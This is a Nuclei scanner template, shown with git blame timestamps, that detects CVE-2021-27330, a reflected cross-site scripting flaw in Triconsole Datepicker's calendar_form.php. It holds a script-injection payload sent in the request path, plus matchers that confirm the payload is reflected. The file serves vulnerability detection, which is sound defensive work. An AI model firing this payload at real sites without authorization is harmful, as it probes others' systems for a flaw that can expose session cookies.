nuclei-templates/cves/2021/CVE-2021-27330.yaml

31 lines
883 B
YAML
Raw Normal View History

2021-03-01 11:46:14 +00:00
id: CVE-2021-27330
info:
name: Triconsole 3.75 XSS
author: pikpikcu
severity: medium
2021-03-24 06:48:11 +00:00
description: Triconsole Datepicker Calendar <3.77 is affected by cross-site scripting (XSS) in calendar_form.php. Attackers can read authentication cookies that are still active, which can be used to perform further attacks such as reading browser history, directory listings, and file contents.
2021-03-02 08:50:19 +00:00
reference: https://www.exploit-db.com/exploits/49597
2021-03-01 11:46:14 +00:00
tags: cve,cve2021,triconsole,xss
requests:
- method: GET
path:
- '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
2021-03-02 07:06:11 +00:00
- type: word
words:
- "text/html"
part: header
2021-03-01 11:46:14 +00:00
- type: status
status:
- 200